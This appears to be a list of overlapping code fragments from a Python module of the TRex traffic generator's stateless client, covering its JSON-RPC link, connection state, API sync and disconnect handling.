"retruns, an async barrier is guaranteed ''' return self.async.barrier() def sync (self): '''",
"avoid any messages handling for the async thread self.async.set_as_zombie() # change state self.state",
"method_name, params = None, retry = 0): return self.rpc_link.invoke_rpc_method(method_name, params, self.api_h, retry =",
"self.rpc_link.disconnect() def transmit(self, method_name, params = None, retry = 0): return self.rpc_link.invoke_rpc_method(method_name, params,",
".trex_stl_async_client import CTRexAsyncClient import time import signal import os ############################ RPC layer #############################",
"conn_info # init state self.state = (self.DISCONNECTED, None) def disconnect (self): ''' disconnect",
"to publisher server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['async_port'])) rc = self.async.connect() self.logger.post_cmd(rc) if not rc:",
"def barrier (self): ''' executes a barrier when it retruns, an async barrier",
"(self): ''' connect to the server (two channels) ''' # first disconnect if",
"present in v2.30 and older if rc.errno() == JsonRpcErrNo.MethodNotSupported: return RC_ERR('Mismatch between client",
"has arrived the server in the last 3 seconds ''' return ( self.async.last_data_recv_ts",
"return ( self.async.last_data_recv_ts is not None and ((time.time() - self.async.last_data_recv_ts) <= 3) )",
"def disconnect (self): ''' disconnect from both channels sync and async ''' try:",
"self.logger = logger self.sigint_on_conn_lost = False # API classes self.api_ver = {'name': 'STL',",
"3 seconds ''' return ( self.async.last_data_recv_ts is not None and ((time.time() - self.async.last_data_recv_ts)",
"self.api_h, retry = retry) def transmit_batch(self, batch_list, retry = 0): batch = self.rpc_link.create_batch()",
"self.CONNECTED) def is_marked_for_disconnect (self): return self.state[0] == self.MARK_FOR_DISCONNECT def get_disconnection_cause (self): return self.state[1]",
"it retruns, an async barrier is guaranteed ''' return self.async.barrier() def sync (self):",
"port self.rpc_link = JsonRpcClient(self.server, self.port, client) # API handler provided by the server",
"connection lost ''' self.sigint_on_conn_lost = False def is_alive (self): ''' return True if",
"fully disconnected, fully connected or marked for disconnection ''' DISCONNECTED = 1 CONNECTED",
"False # API classes self.api_ver = {'name': 'STL', 'major': 4, 'minor': 1} #",
"as JsonRpcErrNo from .trex_stl_async_client import CTRexAsyncClient import time import signal import os ############################",
"API sync V2 rc = self.rpc.transmit(\"api_sync_v2\", params = self.api_ver) self.logger.post_cmd(rc) if not rc:",
"self.is_connected(): self.disconnect() # connect rc = self.__connect() if not rc: self.disconnect() return rc",
"( self.async.last_data_recv_ts is not None and ((time.time() - self.async.last_data_recv_ts) <= 3) ) def",
"batch_list, retry = 0): batch = self.rpc_link.create_batch() for command in batch_list: batch.add(command.method, command.params,",
"############################# class CCommLink(object): \"\"\"Describes the connectivity of the stateless client method\"\"\" def __init__(self,",
"self.MARK_FOR_DISCONNECT def get_disconnection_cause (self): return self.state[1] ########## private ################ def __connect (self): '''",
"was done ''' return self.async.barrier(baseline = True) def mark_for_disconnect (self, cause): ''' A",
"return rc def barrier (self): ''' executes a barrier when it retruns, an",
"data has arrived the server in the last 3 seconds ''' return (",
"rc # get the API_H and provide it to the RPC channel from",
"params, self.api_h, retry = retry) def transmit_batch(self, batch_list, retry = 0): batch =",
"sync (self): ''' fully sync the client with the server must be called",
"''' self.sigint_on_conn_lost = False def is_alive (self): ''' return True if any data",
"<= 3) ) def is_connected (self): return (self.state[0] == self.CONNECTED) def is_marked_for_disconnect (self):",
"if connection is lost a SIGINT will be sent to the main thread",
"layer self.rpc = CCommLink(self.conn_info['server'], self.conn_info['sync_port'], self.conn_info['virtual'], client) self.async = CTRexAsyncClient(self.conn_info['server'], self.conn_info['async_port'], client) #",
"def sigint_on_conn_lost_enable (self): ''' when enabled, if connection is lost a SIGINT will",
"self.async.barrier(baseline = True) def mark_for_disconnect (self, cause): ''' A multithread safe call any",
"self.api_ver) self.logger.post_cmd(rc) if not rc: # api_sync_v2 is not present in v2.30 and",
"main thread # causing the ZMQ RPC to stop what it's doing and",
"config was done ''' return self.async.barrier(baseline = True) def mark_for_disconnect (self, cause): '''",
".trex_stl_types import * from .trex_stl_jsonrpc_client import JsonRpcClient, BatchMessage, ErrNo as JsonRpcErrNo from .trex_stl_async_client",
"rc.data()['api_h'] # connect async channel self.logger.pre_cmd(\"Connecting to publisher server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['async_port'])) rc",
"connect to the server (two channels) ''' # first disconnect if already connected",
"return rc # API sync V2 rc = self.rpc.transmit(\"api_sync_v2\", params = self.api_ver) self.logger.post_cmd(rc)",
"causing the ZMQ RPC to stop what it's doing and report an error",
"a SIGINT will be sent to the main thread # causing the ZMQ",
"return True if any data has arrived the server in the last 3",
"(self): ''' return True if any data has arrived the server in the",
"(self): return self.server def get_port (self): return self.port def connect(self): return self.rpc_link.connect() def",
"self.conn_info['sync_port'])) rc = self.rpc.connect() if not rc: return rc # API sync V2",
"any messages handling for the async thread self.async.set_as_zombie() # change state self.state =",
"and will require the main thread to reconnect ''' # avoid any messages",
"the stateless client method\"\"\" def __init__(self, server=\"localhost\", port=5050, virtual=False, client = None): self.server",
"A multithread safe call any thread can mark the current connection as not",
"import signal import os ############################ RPC layer ############################# ############################ ############################# ############################ ############################# class",
"either fully disconnected, fully connected or marked for disconnection ''' DISCONNECTED = 1",
"# first disconnect if already connected if self.is_connected(): self.disconnect() # connect rc =",
"change state self.state = (self.MARK_FOR_DISCONNECT, cause) # if the flag is on, a",
"if already connected if self.is_connected(): self.disconnect() # connect rc = self.__connect() if not",
"# save pointers self.conn_info = conn_info # init state self.state = (self.DISCONNECTED, None)",
"############################ ############################# ############################ ############################# class CCommLink(object): \"\"\"Describes the connectivity of the stateless client",
"state self.state = (self.MARK_FOR_DISCONNECT, cause) # if the flag is on, a SIGINT",
"{0}:{1}\".format(self.conn_info['server'], self.conn_info['async_port'])) rc = self.async.connect() self.logger.post_cmd(rc) if not rc: return rc self.state =",
"JsonRpcErrNo.MethodNotSupported: return RC_ERR('Mismatch between client and server versions') return rc # get the",
"is on, a SIGINT will be sent to the main thread # causing",
"ZMQ RPC to stop what it's doing and report an error if self.sigint_on_conn_lost:",
"when it retruns, an async barrier is guaranteed ''' return self.async.barrier() def sync",
"state self.state = (self.DISCONNECTED, None) def disconnect (self): ''' disconnect from both channels",
"describes the connection to the server state can be either fully disconnected, fully",
"* from .trex_stl_jsonrpc_client import JsonRpcClient, BatchMessage, ErrNo as JsonRpcErrNo from .trex_stl_async_client import CTRexAsyncClient",
"''' fully sync the client with the server must be called after all",
"self.logger.pre_cmd(\"Connecting to publisher server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['async_port'])) rc = self.async.connect() self.logger.post_cmd(rc) if not",
"the connection to the server state can be either fully disconnected, fully connected",
"sync and async ''' try: self.rpc.disconnect() self.async.disconnect() finally: self.state = (self.DISCONNECTED, None) def",
"def __init__(self, server=\"localhost\", port=5050, virtual=False, client = None): self.server = server self.port =",
"# low level RPC layer self.rpc = CCommLink(self.conn_info['server'], self.conn_info['sync_port'], self.conn_info['virtual'], client) self.async =",
"# API classes self.api_ver = {'name': 'STL', 'major': 4, 'minor': 1} # low",
"'STL', 'major': 4, 'minor': 1} # low level RPC layer self.rpc = CCommLink(self.conn_info['server'],",
"client) # API handler provided by the server self.api_h = None def get_server",
"on self.rpc.api_h = rc.data()['api_h'] # connect async channel self.logger.pre_cmd(\"Connecting to publisher server on",
"############################# ############################ ############################# class CCommLink(object): \"\"\"Describes the connectivity of the stateless client method\"\"\"",
"cause) # if the flag is on, a SIGINT will be sent to",
"sync V2 rc = self.rpc.transmit(\"api_sync_v2\", params = self.api_ver) self.logger.post_cmd(rc) if not rc: #",
"not None and ((time.time() - self.async.last_data_recv_ts) <= 3) ) def is_connected (self): return",
"if rc.errno() == JsonRpcErrNo.MethodNotSupported: return RC_ERR('Mismatch between client and server versions') return rc",
"JsonRpcErrNo from .trex_stl_async_client import CTRexAsyncClient import time import signal import os ############################ RPC",
"get_disconnection_cause (self): return self.state[1] ########## private ################ def __connect (self): ''' connect to",
"both channels sync and async ''' try: self.rpc.disconnect() self.async.disconnect() finally: self.state = (self.DISCONNECTED,",
"lost ''' self.sigint_on_conn_lost = False def is_alive (self): ''' return True if any",
"to the RPC channel from now on self.rpc.api_h = rc.data()['api_h'] # connect async",
"from .trex_stl_types import * from .trex_stl_jsonrpc_client import JsonRpcClient, BatchMessage, ErrNo as JsonRpcErrNo from",
"is guaranteed ''' return self.async.barrier() def sync (self): ''' fully sync the client",
"channel self.logger.pre_cmd(\"Connecting to RPC server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['sync_port'])) rc = self.rpc.connect() if not",
"low level RPC layer self.rpc = CCommLink(self.conn_info['server'], self.conn_info['sync_port'], self.conn_info['virtual'], client) self.async = CTRexAsyncClient(self.conn_info['server'],",
"if self.is_connected(): self.disconnect() # connect rc = self.__connect() if not rc: self.disconnect() return",
"not rc: self.disconnect() return rc def barrier (self): ''' executes a barrier when",
"########## private ################ def __connect (self): ''' connect to the server (two channels)",
"server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['async_port'])) rc = self.async.connect() self.logger.post_cmd(rc) if not rc: return rc",
"self.rpc.connect() if not rc: return rc # API sync V2 rc = self.rpc.transmit(\"api_sync_v2\",",
"batch = self.rpc_link.create_batch() for command in batch_list: batch.add(command.method, command.params, self.api_h) # invoke the",
"a SIGINT will be sent to the main thread ''' self.sigint_on_conn_lost = True",
"server=\"localhost\", port=5050, virtual=False, client = None): self.server = server self.port = port self.rpc_link",
"batch.invoke(retry = retry) class Connection(object): ''' Manages that connection to the server connection",
"import JsonRpcClient, BatchMessage, ErrNo as JsonRpcErrNo from .trex_stl_async_client import CTRexAsyncClient import time import",
"batch return batch.invoke(retry = retry) class Connection(object): ''' Manages that connection to the",
"= self.async.connect() self.logger.post_cmd(rc) if not rc: return rc self.state = (self.CONNECTED, None) return",
"BatchMessage, ErrNo as JsonRpcErrNo from .trex_stl_async_client import CTRexAsyncClient import time import signal import",
"client method\"\"\" def __init__(self, server=\"localhost\", port=5050, virtual=False, client = None): self.server = server",
"self.rpc.disconnect() self.async.disconnect() finally: self.state = (self.DISCONNECTED, None) def connect (self): ''' connect to",
"= True) def mark_for_disconnect (self, cause): ''' A multithread safe call any thread",
"dispatching on case of connection lost ''' self.sigint_on_conn_lost = False def is_alive (self):",
"self.api_h = None def get_server (self): return self.server def get_port (self): return self.port",
"batch.add(command.method, command.params, self.api_h) # invoke the batch return batch.invoke(retry = retry) class Connection(object):",
"thread # causing the ZMQ RPC to stop what it's doing and report",
"the RPC channel from now on self.rpc.api_h = rc.data()['api_h'] # connect async channel",
"= (self.DISCONNECTED, None) def disconnect (self): ''' disconnect from both channels sync and",
"MARK_FOR_DISCONNECT = 3 def __init__ (self, conn_info, logger, client): self.conn_info = conn_info self.logger",
"CTRexAsyncClient import time import signal import os ############################ RPC layer ############################# ############################ #############################",
"level RPC layer self.rpc = CCommLink(self.conn_info['server'], self.conn_info['sync_port'], self.conn_info['virtual'], client) self.async = CTRexAsyncClient(self.conn_info['server'], self.conn_info['async_port'],",
"''' disconnect from both channels sync and async ''' try: self.rpc.disconnect() self.async.disconnect() finally:",
"self.async.barrier() def sync (self): ''' fully sync the client with the server must",
"RPC channel from now on self.rpc.api_h = rc.data()['api_h'] # connect async channel self.logger.pre_cmd(\"Connecting",
"def get_port (self): return self.port def connect(self): return self.rpc_link.connect() def disconnect(self): self.api_h =",
"params = self.api_ver) self.logger.post_cmd(rc) if not rc: # api_sync_v2 is not present in",
"transmit_batch(self, batch_list, retry = 0): batch = self.rpc_link.create_batch() for command in batch_list: batch.add(command.method,",
"return self.port def connect(self): return self.rpc_link.connect() def disconnect(self): self.api_h = None return self.rpc_link.disconnect()",
"''' when enabled, if connection is lost a SIGINT will be sent to",
"will be sent to the main thread ''' self.sigint_on_conn_lost = True def sigint_on_conn_lost_disable",
"= False def is_alive (self): ''' return True if any data has arrived",
"(self.DISCONNECTED, None) def connect (self): ''' connect to the server (two channels) '''",
"= retry) class Connection(object): ''' Manages that connection to the server connection state",
"client) # save pointers self.conn_info = conn_info # init state self.state = (self.DISCONNECTED,",
"(self): ''' when enabled, if connection is lost a SIGINT will be sent",
"command in batch_list: batch.add(command.method, command.params, self.api_h) # invoke the batch return batch.invoke(retry =",
"already connected if self.is_connected(): self.disconnect() # connect rc = self.__connect() if not rc:",
"channel self.logger.pre_cmd(\"Connecting to publisher server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['async_port'])) rc = self.async.connect() self.logger.post_cmd(rc) if",
"return self.rpc_link.connect() def disconnect(self): self.api_h = None return self.rpc_link.disconnect() def transmit(self, method_name, params",
"# causing the ZMQ RPC to stop what it's doing and report an",
"the batch return batch.invoke(retry = retry) class Connection(object): ''' Manages that connection to",
"''' # start with the sync channel self.logger.pre_cmd(\"Connecting to RPC server on {0}:{1}\".format(self.conn_info['server'],",
"Connection(object): ''' Manages that connection to the server connection state object describes the",
"def is_alive (self): ''' return True if any data has arrived the server",
"self.conn_info['async_port'], client) # save pointers self.conn_info = conn_info # init state self.state =",
"\"\"\"Describes the connectivity of the stateless client method\"\"\" def __init__(self, server=\"localhost\", port=5050, virtual=False,",
"= self.api_ver) self.logger.post_cmd(rc) if not rc: # api_sync_v2 is not present in v2.30",
"when enabled, if connection is lost a SIGINT will be sent to the",
"# connect async channel self.logger.pre_cmd(\"Connecting to publisher server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['async_port'])) rc =",
"current connection as not valid and will require the main thread to reconnect",
"= (self.MARK_FOR_DISCONNECT, cause) # if the flag is on, a SIGINT will be",
"self.async.set_as_zombie() # change state self.state = (self.MARK_FOR_DISCONNECT, cause) # if the flag is",
"connection to the server state can be either fully disconnected, fully connected or",
"(self): ''' disable SIGINT dispatching on case of connection lost ''' self.sigint_on_conn_lost =",
"= 0): batch = self.rpc_link.create_batch() for command in batch_list: batch.add(command.method, command.params, self.api_h) #",
"safe call any thread can mark the current connection as not valid and",
"signal import os ############################ RPC layer ############################# ############################ ############################# ############################ ############################# class CCommLink(object):",
"Manages that connection to the server connection state object describes the connection to",
"server connection state object describes the connection to the server state can be",
"logger, client): self.conn_info = conn_info self.logger = logger self.sigint_on_conn_lost = False # API",
"and provide it to the RPC channel from now on self.rpc.api_h = rc.data()['api_h']",
") def is_connected (self): return (self.state[0] == self.CONNECTED) def is_marked_for_disconnect (self): return self.state[0]",
"connection state object describes the connection to the server state can be either",
"# init state self.state = (self.DISCONNECTED, None) def disconnect (self): ''' disconnect from",
"1} # low level RPC layer self.rpc = CCommLink(self.conn_info['server'], self.conn_info['sync_port'], self.conn_info['virtual'], client) self.async",
"to the server state can be either fully disconnected, fully connected or marked",
".trex_stl_jsonrpc_client import JsonRpcClient, BatchMessage, ErrNo as JsonRpcErrNo from .trex_stl_async_client import CTRexAsyncClient import time",
"return self.rpc_link.invoke_rpc_method(method_name, params, self.api_h, retry = retry) def transmit_batch(self, batch_list, retry = 0):",
"async channel self.logger.pre_cmd(\"Connecting to publisher server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['async_port'])) rc = self.async.connect() self.logger.post_cmd(rc)",
"the server state can be either fully disconnected, fully connected or marked for",
"self.state = (self.DISCONNECTED, None) def connect (self): ''' connect to the server (two",
"self.server = server self.port = port self.rpc_link = JsonRpcClient(self.server, self.port, client) # API",
"retry) class Connection(object): ''' Manages that connection to the server connection state object",
"sent to the main thread ''' self.sigint_on_conn_lost = True def sigint_on_conn_lost_disable (self): '''",
"self.state = (self.DISCONNECTED, None) def disconnect (self): ''' disconnect from both channels sync",
"v2.30 and older if rc.errno() == JsonRpcErrNo.MethodNotSupported: return RC_ERR('Mismatch between client and server",
"not valid and will require the main thread to reconnect ''' # avoid",
"# start with the sync channel self.logger.pre_cmd(\"Connecting to RPC server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['sync_port']))",
"the connectivity of the stateless client method\"\"\" def __init__(self, server=\"localhost\", port=5050, virtual=False, client",
"server (two channels) ''' # first disconnect if already connected if self.is_connected(): self.disconnect()",
"the server self.api_h = None def get_server (self): return self.server def get_port (self):",
"(self, cause): ''' A multithread safe call any thread can mark the current",
"3) ) def is_connected (self): return (self.state[0] == self.CONNECTED) def is_marked_for_disconnect (self): return",
"on {0}:{1}\".format(self.conn_info['server'], self.conn_info['async_port'])) rc = self.async.connect() self.logger.post_cmd(rc) if not rc: return rc self.state",
"= 2 MARK_FOR_DISCONNECT = 3 def __init__ (self, conn_info, logger, client): self.conn_info =",
"(self): ''' disconnect from both channels sync and async ''' try: self.rpc.disconnect() self.async.disconnect()",
"the server (two channels) ''' # first disconnect if already connected if self.is_connected():",
"guaranteed ''' return self.async.barrier() def sync (self): ''' fully sync the client with",
"an error if self.sigint_on_conn_lost: os.kill(os.getpid(), signal.SIGINT) def sigint_on_conn_lost_enable (self): ''' when enabled, if",
"any data has arrived the server in the last 3 seconds ''' return",
"and async ''' try: self.rpc.disconnect() self.async.disconnect() finally: self.state = (self.DISCONNECTED, None) def connect",
"to the main thread # causing the ZMQ RPC to stop what it's",
"the main thread # causing the ZMQ RPC to stop what it's doing",
"will be sent to the main thread # causing the ZMQ RPC to",
"def __connect (self): ''' connect to the server (two channels) ''' # start",
"save pointers self.conn_info = conn_info # init state self.state = (self.DISCONNECTED, None) def",
"= None def get_server (self): return self.server def get_port (self): return self.port def",
"# if the flag is on, a SIGINT will be sent to the",
"1 CONNECTED = 2 MARK_FOR_DISCONNECT = 3 def __init__ (self, conn_info, logger, client):",
"command.params, self.api_h) # invoke the batch return batch.invoke(retry = retry) class Connection(object): '''",
"provide it to the RPC channel from now on self.rpc.api_h = rc.data()['api_h'] #",
"self.server def get_port (self): return self.port def connect(self): return self.rpc_link.connect() def disconnect(self): self.api_h",
"== self.MARK_FOR_DISCONNECT def get_disconnection_cause (self): return self.state[1] ########## private ################ def __connect (self):",
"can be either fully disconnected, fully connected or marked for disconnection ''' DISCONNECTED",
"connected if self.is_connected(): self.disconnect() # connect rc = self.__connect() if not rc: self.disconnect()",
"classes self.api_ver = {'name': 'STL', 'major': 4, 'minor': 1} # low level RPC",
"self.rpc_link.invoke_rpc_method(method_name, params, self.api_h, retry = retry) def transmit_batch(self, batch_list, retry = 0): batch",
"if self.sigint_on_conn_lost: os.kill(os.getpid(), signal.SIGINT) def sigint_on_conn_lost_enable (self): ''' when enabled, if connection is",
"server state can be either fully disconnected, fully connected or marked for disconnection",
"private ################ def __connect (self): ''' connect to the server (two channels) '''",
"os.kill(os.getpid(), signal.SIGINT) def sigint_on_conn_lost_enable (self): ''' when enabled, if connection is lost a",
"if any data has arrived the server in the last 3 seconds '''",
"start with the sync channel self.logger.pre_cmd(\"Connecting to RPC server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['sync_port'])) rc",
"error if self.sigint_on_conn_lost: os.kill(os.getpid(), signal.SIGINT) def sigint_on_conn_lost_enable (self): ''' when enabled, if connection",
"thread ''' self.sigint_on_conn_lost = True def sigint_on_conn_lost_disable (self): ''' disable SIGINT dispatching on",
"the current connection as not valid and will require the main thread to",
"on, a SIGINT will be sent to the main thread # causing the",
"executes a barrier when it retruns, an async barrier is guaranteed ''' return",
"conn_info, logger, client): self.conn_info = conn_info self.logger = logger self.sigint_on_conn_lost = False #",
"def disconnect(self): self.api_h = None return self.rpc_link.disconnect() def transmit(self, method_name, params = None,",
"retry = 0): return self.rpc_link.invoke_rpc_method(method_name, params, self.api_h, retry = retry) def transmit_batch(self, batch_list,",
"in the last 3 seconds ''' return ( self.async.last_data_recv_ts is not None and",
"publisher server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['async_port'])) rc = self.async.connect() self.logger.post_cmd(rc) if not rc: return",
"retry = retry) def transmit_batch(self, batch_list, retry = 0): batch = self.rpc_link.create_batch() for",
"will require the main thread to reconnect ''' # avoid any messages handling",
"handling for the async thread self.async.set_as_zombie() # change state self.state = (self.MARK_FOR_DISCONNECT, cause)",
"disconnect from both channels sync and async ''' try: self.rpc.disconnect() self.async.disconnect() finally: self.state",
"= conn_info # init state self.state = (self.DISCONNECTED, None) def disconnect (self): '''",
"be either fully disconnected, fully connected or marked for disconnection ''' DISCONNECTED =",
"to the server (two channels) ''' # first disconnect if already connected if",
"= self.__connect() if not rc: self.disconnect() return rc def barrier (self): ''' executes",
"((time.time() - self.async.last_data_recv_ts) <= 3) ) def is_connected (self): return (self.state[0] == self.CONNECTED)",
"retry) def transmit_batch(self, batch_list, retry = 0): batch = self.rpc_link.create_batch() for command in",
"now on self.rpc.api_h = rc.data()['api_h'] # connect async channel self.logger.pre_cmd(\"Connecting to publisher server",
"the config was done ''' return self.async.barrier(baseline = True) def mark_for_disconnect (self, cause):",
"None return self.rpc_link.disconnect() def transmit(self, method_name, params = None, retry = 0): return",
"0): return self.rpc_link.invoke_rpc_method(method_name, params, self.api_h, retry = retry) def transmit_batch(self, batch_list, retry =",
"init state self.state = (self.DISCONNECTED, None) def disconnect (self): ''' disconnect from both",
"it's doing and report an error if self.sigint_on_conn_lost: os.kill(os.getpid(), signal.SIGINT) def sigint_on_conn_lost_enable (self):",
"== JsonRpcErrNo.MethodNotSupported: return RC_ERR('Mismatch between client and server versions') return rc # get",
"is_alive (self): ''' return True if any data has arrived the server in",
"# api_sync_v2 is not present in v2.30 and older if rc.errno() == JsonRpcErrNo.MethodNotSupported:",
"import CTRexAsyncClient import time import signal import os ############################ RPC layer ############################# ############################",
"server in the last 3 seconds ''' return ( self.async.last_data_recv_ts is not None",
"self.disconnect() # connect rc = self.__connect() if not rc: self.disconnect() return rc def",
"flag is on, a SIGINT will be sent to the main thread #",
"############################ ############################# class CCommLink(object): \"\"\"Describes the connectivity of the stateless client method\"\"\" def",
"params = None, retry = 0): return self.rpc_link.invoke_rpc_method(method_name, params, self.api_h, retry = retry)",
"disconnected, fully connected or marked for disconnection ''' DISCONNECTED = 1 CONNECTED =",
"on case of connection lost ''' self.sigint_on_conn_lost = False def is_alive (self): '''",
"from both channels sync and async ''' try: self.rpc.disconnect() self.async.disconnect() finally: self.state =",
"if the flag is on, a SIGINT will be sent to the main",
"invoke the batch return batch.invoke(retry = retry) class Connection(object): ''' Manages that connection",
"self.sigint_on_conn_lost = False def is_alive (self): ''' return True if any data has",
"must be called after all the config was done ''' return self.async.barrier(baseline =",
"None) def disconnect (self): ''' disconnect from both channels sync and async '''",
"API handler provided by the server self.api_h = None def get_server (self): return",
"= self.rpc_link.create_batch() for command in batch_list: batch.add(command.method, command.params, self.api_h) # invoke the batch",
"self.rpc_link.create_batch() for command in batch_list: batch.add(command.method, command.params, self.api_h) # invoke the batch return",
"= logger self.sigint_on_conn_lost = False # API classes self.api_ver = {'name': 'STL', 'major':",
"self.disconnect() return rc def barrier (self): ''' executes a barrier when it retruns,",
"rc = self.async.connect() self.logger.post_cmd(rc) if not rc: return rc self.state = (self.CONNECTED, None)",
"self.logger.post_cmd(rc) if not rc: # api_sync_v2 is not present in v2.30 and older",
"return self.server def get_port (self): return self.port def connect(self): return self.rpc_link.connect() def disconnect(self):",
"doing and report an error if self.sigint_on_conn_lost: os.kill(os.getpid(), signal.SIGINT) def sigint_on_conn_lost_enable (self): '''",
"= retry) def transmit_batch(self, batch_list, retry = 0): batch = self.rpc_link.create_batch() for command",
"self.async.connect() self.logger.post_cmd(rc) if not rc: return rc self.state = (self.CONNECTED, None) return RC_OK()",
"connection is lost a SIGINT will be sent to the main thread '''",
"state object describes the connection to the server state can be either fully",
"thread self.async.set_as_zombie() # change state self.state = (self.MARK_FOR_DISCONNECT, cause) # if the flag",
"(self): return (self.state[0] == self.CONNECTED) def is_marked_for_disconnect (self): return self.state[0] == self.MARK_FOR_DISCONNECT def",
"JsonRpcClient, BatchMessage, ErrNo as JsonRpcErrNo from .trex_stl_async_client import CTRexAsyncClient import time import signal",
"2 MARK_FOR_DISCONNECT = 3 def __init__ (self, conn_info, logger, client): self.conn_info = conn_info",
"client) self.async = CTRexAsyncClient(self.conn_info['server'], self.conn_info['async_port'], client) # save pointers self.conn_info = conn_info #",
"what it's doing and report an error if self.sigint_on_conn_lost: os.kill(os.getpid(), signal.SIGINT) def sigint_on_conn_lost_enable",
"self.state[0] == self.MARK_FOR_DISCONNECT def get_disconnection_cause (self): return self.state[1] ########## private ################ def __connect",
"versions') return rc # get the API_H and provide it to the RPC",
"ErrNo as JsonRpcErrNo from .trex_stl_async_client import CTRexAsyncClient import time import signal import os",
"(self, conn_info, logger, client): self.conn_info = conn_info self.logger = logger self.sigint_on_conn_lost = False",
"sigint_on_conn_lost_enable (self): ''' when enabled, if connection is lost a SIGINT will be",
"def get_server (self): return self.server def get_port (self): return self.port def connect(self): return",
"thread to reconnect ''' # avoid any messages handling for the async thread",
"channels) ''' # start with the sync channel self.logger.pre_cmd(\"Connecting to RPC server on",
"if not rc: return rc # API sync V2 rc = self.rpc.transmit(\"api_sync_v2\", params",
"fully connected or marked for disconnection ''' DISCONNECTED = 1 CONNECTED = 2",
"''' return self.async.barrier(baseline = True) def mark_for_disconnect (self, cause): ''' A multithread safe",
"of the stateless client method\"\"\" def __init__(self, server=\"localhost\", port=5050, virtual=False, client = None):",
"self.api_ver = {'name': 'STL', 'major': 4, 'minor': 1} # low level RPC layer",
"connect async channel self.logger.pre_cmd(\"Connecting to publisher server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['async_port'])) rc = self.async.connect()",
"channels) ''' # first disconnect if already connected if self.is_connected(): self.disconnect() # connect",
"return self.async.barrier() def sync (self): ''' fully sync the client with the server",
"conn_info self.logger = logger self.sigint_on_conn_lost = False # API classes self.api_ver = {'name':",
"main thread ''' self.sigint_on_conn_lost = True def sigint_on_conn_lost_disable (self): ''' disable SIGINT dispatching",
"''' executes a barrier when it retruns, an async barrier is guaranteed '''",
"4, 'minor': 1} # low level RPC layer self.rpc = CCommLink(self.conn_info['server'], self.conn_info['sync_port'], self.conn_info['virtual'],",
"True if any data has arrived the server in the last 3 seconds",
"the main thread to reconnect ''' # avoid any messages handling for the",
"transmit(self, method_name, params = None, retry = 0): return self.rpc_link.invoke_rpc_method(method_name, params, self.api_h, retry",
"self.rpc = CCommLink(self.conn_info['server'], self.conn_info['sync_port'], self.conn_info['virtual'], client) self.async = CTRexAsyncClient(self.conn_info['server'], self.conn_info['async_port'], client) # save",
"''' A multithread safe call any thread can mark the current connection as",
"import time import signal import os ############################ RPC layer ############################# ############################ ############################# ############################",
"is not present in v2.30 and older if rc.errno() == JsonRpcErrNo.MethodNotSupported: return RC_ERR('Mismatch",
"self.rpc_link.connect() def disconnect(self): self.api_h = None return self.rpc_link.disconnect() def transmit(self, method_name, params =",
"# API handler provided by the server self.api_h = None def get_server (self):",
"layer ############################# ############################ ############################# ############################ ############################# class CCommLink(object): \"\"\"Describes the connectivity of the",
"cause): ''' A multithread safe call any thread can mark the current connection",
"by the server self.api_h = None def get_server (self): return self.server def get_port",
"as not valid and will require the main thread to reconnect ''' #",
"handler provided by the server self.api_h = None def get_server (self): return self.server",
"(self.state[0] == self.CONNECTED) def is_marked_for_disconnect (self): return self.state[0] == self.MARK_FOR_DISCONNECT def get_disconnection_cause (self):",
"to the server (two channels) ''' # start with the sync channel self.logger.pre_cmd(\"Connecting",
"async ''' try: self.rpc.disconnect() self.async.disconnect() finally: self.state = (self.DISCONNECTED, None) def connect (self):",
"report an error if self.sigint_on_conn_lost: os.kill(os.getpid(), signal.SIGINT) def sigint_on_conn_lost_enable (self): ''' when enabled,",
"= 3 def __init__ (self, conn_info, logger, client): self.conn_info = conn_info self.logger =",
"__init__ (self, conn_info, logger, client): self.conn_info = conn_info self.logger = logger self.sigint_on_conn_lost =",
"CONNECTED = 2 MARK_FOR_DISCONNECT = 3 def __init__ (self, conn_info, logger, client): self.conn_info",
"__init__(self, server=\"localhost\", port=5050, virtual=False, client = None): self.server = server self.port = port",
"= CCommLink(self.conn_info['server'], self.conn_info['sync_port'], self.conn_info['virtual'], client) self.async = CTRexAsyncClient(self.conn_info['server'], self.conn_info['async_port'], client) # save pointers",
"''' return True if any data has arrived the server in the last",
"return RC_ERR('Mismatch between client and server versions') return rc # get the API_H",
"disconnect(self): self.api_h = None return self.rpc_link.disconnect() def transmit(self, method_name, params = None, retry",
"return self.async.barrier(baseline = True) def mark_for_disconnect (self, cause): ''' A multithread safe call",
"on {0}:{1}\".format(self.conn_info['server'], self.conn_info['sync_port'])) rc = self.rpc.connect() if not rc: return rc # API",
"SIGINT dispatching on case of connection lost ''' self.sigint_on_conn_lost = False def is_alive",
"get the API_H and provide it to the RPC channel from now on",
"self.__connect() if not rc: self.disconnect() return rc def barrier (self): ''' executes a",
"(self): ''' fully sync the client with the server must be called after",
"= False # API classes self.api_ver = {'name': 'STL', 'major': 4, 'minor': 1}",
"first disconnect if already connected if self.is_connected(): self.disconnect() # connect rc = self.__connect()",
"logger self.sigint_on_conn_lost = False # API classes self.api_ver = {'name': 'STL', 'major': 4,",
"################ def __connect (self): ''' connect to the server (two channels) ''' #",
"# invoke the batch return batch.invoke(retry = retry) class Connection(object): ''' Manages that",
"the server connection state object describes the connection to the server state can",
"connect to the server (two channels) ''' # start with the sync channel",
"= None): self.server = server self.port = port self.rpc_link = JsonRpcClient(self.server, self.port, client)",
"self.logger.pre_cmd(\"Connecting to RPC server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['sync_port'])) rc = self.rpc.connect() if not rc:",
"to the server connection state object describes the connection to the server state",
"self.port def connect(self): return self.rpc_link.connect() def disconnect(self): self.api_h = None return self.rpc_link.disconnect() def",
"retry = 0): batch = self.rpc_link.create_batch() for command in batch_list: batch.add(command.method, command.params, self.api_h)",
"'major': 4, 'minor': 1} # low level RPC layer self.rpc = CCommLink(self.conn_info['server'], self.conn_info['sync_port'],",
"False def is_alive (self): ''' return True if any data has arrived the",
"is lost a SIGINT will be sent to the main thread ''' self.sigint_on_conn_lost",
